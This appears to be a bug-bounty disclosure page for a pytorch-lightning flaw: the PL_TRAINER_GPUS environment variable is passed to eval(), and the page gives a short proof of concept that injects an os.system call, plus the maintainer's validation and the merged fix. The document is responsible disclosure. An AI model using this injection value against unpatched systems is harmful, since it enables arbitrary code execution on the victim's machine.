Valid

Reported on

Mar 2nd 2022


Description

The attacker can execute commands on the target OS running the operating system by setting the PL_TRAINER_GPUS when using the Trainer module.

Proof of Concept

$ pip3 install pytorch-lightning
import os
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.argparse import *


parse_env_variables(Trainer)
$ ls
os.environ["PL_TRAINER_GPUS"] = 'os.system("touch rickroll")'

parse_env_variables(Trainer)
$ ls
rickroll

Collab Notebook: https://colab.research.google.com/drive/1lMPSsKN7cNWcHkh7ZBvsNkCZRcoTPJq8?usp=sharing

Impact

This vulnerability is capable of executing remote code on the target system in the context of the user running the program.

Occurrences

The vulnerability arises due to unsanitized input being passed being passed to the eval() function

        if not (val is None or val == ""):
            # todo: specify the possible exception
            with suppress(Exception):
                # converting to native types like int/float/bool
                val = eval(val)
We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. 3 months ago
whokilleddb submitted a
3 months ago
We have contacted a member of the pytorchlightning/pytorch-lightning team and are waiting to hear back 3 months ago
Carlos Mocholí validated this vulnerability 3 months ago
whokilleddb has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
3 months ago

Maintainer


@whokilleddb, are you interested in opening a PR with the fix?

Carlos Mocholí
3 months ago

Maintainer


Oh, just saw you already suggested a patch. You can go ahead and open a PR to the repository

whokilleddb submitted a
3 months ago
whokilleddb
3 months ago

Researcher


Hi Carlos, I just published my PR. Sorry for any errors in the contribution. Looking forward to it getting merged 😊

whokilleddb
3 months ago

Researcher


Hi Carlos, can you please confirm the following PR:

https://github.com/PyTorchLightning/pytorch-lightning/pull/12212

Carlos Mocholí confirmed that a fix has been merged on 8b7a12 3 months ago
whokilleddb has been awarded the fix bounty
argparse.py#L124 has been validated
to join this conversation